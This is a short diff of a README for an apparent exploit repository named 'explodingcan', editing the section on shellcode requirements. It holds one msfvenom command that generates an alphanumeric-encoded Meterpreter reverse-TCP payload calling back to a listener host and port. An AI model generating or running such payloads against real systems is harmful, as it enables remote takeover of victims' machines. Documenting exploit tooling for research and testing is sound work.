w0rtw0rt/explodingcan/README.md

 ## Shellcode

-The shellcode must be in alphanumeric format due to the limitations of the bug. e.g. with Metasploit using the `alpha_mixed` encoder:
+The shellcode must be in alphanumeric format due to the limitations of the bug.

+Example using msfvenom from metasploit with the `alpha_mixed` encoder.:

 ```
 $ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode